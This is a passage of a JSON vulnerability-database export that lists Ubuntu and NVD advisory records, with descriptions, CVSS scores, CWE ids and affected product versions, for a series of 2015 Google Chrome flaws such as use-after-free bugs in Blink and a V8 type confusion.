"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1237"], "modified": "2015-04-19T00:00:00", "id": "UB:CVE-2015-1237", "href": "https://ubuntu.com/security/CVE-2015-1237", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:52", "description": "Skia, as used in Google Chrome before 42.0.2311.90, allows remote attackers\nto cause a denial of service (out-of-bounds write) or possibly have\nunspecified other impact via unknown vectors.", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1238", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1238"], "modified": "2015-04-19T00:00:00", "id": "UB:CVE-2015-1238", "href": "https://ubuntu.com/security/CVE-2015-1238", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:53:34", "description": "PDFium, as used in Google Chrome before 43.0.2357.65, does not properly initialize memory, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1259", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1259"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1259", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1259", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:31", "description": "Use-after-free vulnerability in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document that leverages improper handling of a shadow tree for a use element.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1256", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1256"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1256", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:41", "description": "Multiple unspecified vulnerabilities in Google Chrome before 43.0.2357.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1265", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1265"], "modified": "2017-09-17T01:29:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1265", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:17", "description": "Use-after-free vulnerability in the MutationObserver::disconnect function in core/dom/MutationObserver.cpp in the DOM implementation in Blink, as used in Google Chrome before 42.0.2311.135, allows remote attackers to cause a denial of service or possibly have unspecified other impact by triggering an attempt to unregister a MutationObserver object that is not currently registered.", "cvss3": {}, "published": "2015-05-01T10:59:00", "type": "cve", "title": "CVE-2015-1243", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1243"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:15.04", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:google:chrome:42.0.2311.87", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0"], "id": "CVE-2015-1243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1243", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.87:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:40", "description": "Cross-site scripting (XSS) vulnerability in Google Chrome before 43.0.2357.65 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted data that is improperly handled by the Bookmarks feature.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1264", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1264"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1264", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1264", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:33", "description": "Google Chrome before 43.0.2357.65 relies on libvpx code that was not built with an appropriate --size-limit value, which allows remote attackers to trigger a negative value for a size field, and consequently cause a denial of service or possibly have unspecified other impact, via a crafted frame size in VP9 video data.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1258", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1258", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1258", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:37", "description": "platform/fonts/shaping/HarfBuzzShaper.cpp in Blink, as used in Google Chrome before 43.0.2357.65, does not initialize a certain width field, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted Unicode text.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1262", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1262"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:28", "description": "core/dom/Document.cpp in Blink, as used in Google Chrome before 43.0.2357.65, enables the inheritance of the designMode attribute, which allows remote attackers to bypass the Same Origin Policy by leveraging the availability of editing.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1254", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1254"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1254", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1254", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:33", "description": "platform/graphics/filters/FEColorMatrix.cpp in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, does not properly handle an insufficient number of values in an feColorMatrix filter, which allows remote attackers to cause a denial of service (container overflow) or possibly have unspecified other impact via a crafted document.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1257", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1257"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1257", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1257", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:30", "description": "Use-after-free vulnerability in content/renderer/media/webaudio_capturer_source.cc in the WebAudio implementation in Google Chrome before 43.0.2357.65 allows remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact by leveraging improper handling of a stop action for an audio track.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1255", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1255"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1255", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1255", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:25", "description": "Multiple unspecified vulnerabilities in Google Chrome before 42.0.2311.135 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-01T10:59:00", "type": "cve", "title": "CVE-2015-1250", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1250"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:15.04", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z", "cpe:/a:google:chrome:42.0.2311.87", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0"], "id": "CVE-2015-1250", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1250", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.87:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:18", "description": "The URLRequest::GetHSTSRedirect function in url_request/url_request.cc in Google Chrome before 42.0.2311.90 does not replace the ws scheme with the wss scheme whenever an HSTS Policy is active, which makes it easier for remote attackers to obtain sensitive information by sniffing the network for WebSocket traffic.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "cve", "title": "CVE-2015-1244", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1244"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.60", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "CVE-2015-1244", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1244", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.60:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:26", "description": "Use-after-free vulnerability in the SpeechRecognitionClient implementation in the Speech subsystem in Google Chrome before 43.0.2357.65 allows remote attackers to execute arbitrary code via a crafted document.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1251", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251"], "modified": "2018-10-09T19:55:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1251", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1251", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:28", "description": "core/html/parser/HTMLConstructionSite.cpp in the DOM implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to bypass the Same Origin Policy via crafted JavaScript code that appends a child to a SCRIPT element, related to the insert and executeReparentTask functions.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1253", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1253"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1253", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1253", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:35", "description": "Multiple use-after-free vulnerabilities in content/renderer/media/user_media_client_impl.cc in the WebRTC implementation in Google Chrome before 43.0.2357.65 allow remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code that executes upon completion of a getUserMedia request.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1260", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1260"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1260", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1260", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:39", "description": "The Spellcheck API implementation in Google Chrome before 43.0.2357.65 does not use an HTTPS session for downloading a Hunspell dictionary, which allows man-in-the-middle attackers to deliver incorrect spelling suggestions or possibly have unspecified other impact via a crafted file.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1263", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1263", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1263", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:16", "description": "The ReduceTransitionElementsKind function in hydrogen-check-elimination.cc in Google V8 before 4.2.77.8, as used in Google Chrome before 42.0.2311.90, allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code that leverages \"type confusion\" in the check-elimination optimization.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "cve", "title": "CVE-2015-1242", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1242"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:v8:4.2.77.7", "cpe:/a:google:chrome:42.0.2311.60", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "CVE-2015-1242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1242", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.60:*:*:*:*:*:*:*", "cpe:2.3:a:google:v8:4.2.77.7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:19", "description": "Use-after-free vulnerability in the OpenPDFInReaderView::Update function in 